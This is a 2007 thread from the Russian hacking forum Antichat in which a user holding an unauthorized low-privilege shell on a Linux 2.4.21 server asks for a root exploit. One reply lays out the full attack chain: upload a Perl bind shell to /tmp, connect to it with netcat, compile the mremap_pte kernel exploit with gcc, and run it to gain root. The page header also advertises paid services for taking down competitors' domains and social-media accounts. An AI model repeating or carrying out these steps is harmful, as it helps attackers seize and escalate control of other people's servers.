Форум АНТИЧАТ - Linux 2.4.21-40.ELsmp

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
Linux 2.4.21-40.ELsmp

Опции темы

Поиск в этой теме

Опции просмотра

Linux 2.4.21-40.ELsmp

06.01.2007, 03:32

Lancellot

Участник форума

Регистрация: 09.08.2006

Сообщений: 157

Провел на форуме:
1583810

Репутация: 56

Linux 2.4.21-40.ELsmp

Ку!Есть шелл на сервере с такой ОС Linux 2.4.21-40.ELsmp,права у меня uid=99(nobody) gid=99(nobody) groups=99(nobody)!
Сервер :Apache/1.3.37 (Unix)
=========================================
Вопрос :Есть сплоит для поднятий привилегий?
Я искал не нашел!
Или есть другой способ как добыть права ближе к руту!
==========================================
Заранее спасибо!
З.Ы Я вот здесь нашел какойто сплоит подойдет он !
С меня +++++

06.01.2007, 03:54

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

brk
mremap
elf

06.01.2007, 03:58

Lancellot

Участник форума

Регистрация: 09.08.2006

Сообщений: 157

Провел на форуме:
1583810

Репутация: 56

cash ,теперь нормальным языком чего ты хотел сказать!?

06.01.2007, 06:55

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Lancellot
вообще то мог тут задать свои вопрос. Это касается ОС:Linux.

Цитата:

cash ,теперь нормальным языком чего ты хотел сказать!?

Почитай здесь:

Цитата:

forum.antichat.ru/thread29605.html

06.01.2007, 07:02

~~zl0ba~~

Banned

Регистрация: 10.10.2006

Сообщений: 596

Провел на форуме:
2132613

Репутация: 1365

Будем брать експлоитом mremap_pte.
Для этого нам надо пробиндить тачку, что бы получить шелл обалочку. Ищем открытую папку для заливки файла.
По дефолту это папка tmp. Залеваем bind.pl и запускаем командой perl bind.pl. Открываем net cat и вбиваем
www.xxxxxxx.xxx 32767. Появился back conect. Проверяем на наличии компилятора командой which gcc.
Залеваем наш експлоит в tmp. Компилим gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte.
Запускаем ./mremap_pte и проверяем права.

06.01.2007, 11:06

NIGHT_WOLF

Участник форума

Регистрация: 17.08.2005

Сообщений: 237

Провел на форуме:
1575267

Репутация: 27

Отправить сообщение для NIGHT_WOLF с помощью ICQ

Чтобы новую тему не открывать спрошу сдесь.
FreeBSD 5.5-RELEASE-p2 для этого существуют сплоиты в паблике ?

06.01.2007, 11:07

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

нет

06.01.2007, 18:45

Lancellot

Участник форума

Регистрация: 09.08.2006

Сообщений: 157

Провел на форуме:
1583810

Репутация: 56

Всем спасибо!Направили на правильный путь,роскрыли глаза!!!

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
FAQ по установке Linux	»Atom1c«	*nix	19	18.12.2006 01:58
«Лаборатории Касперского»: Количество вредоносных программ под Linux резко возросло	dinar_007	Мировые новости	9	20.08.2006 20:50

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход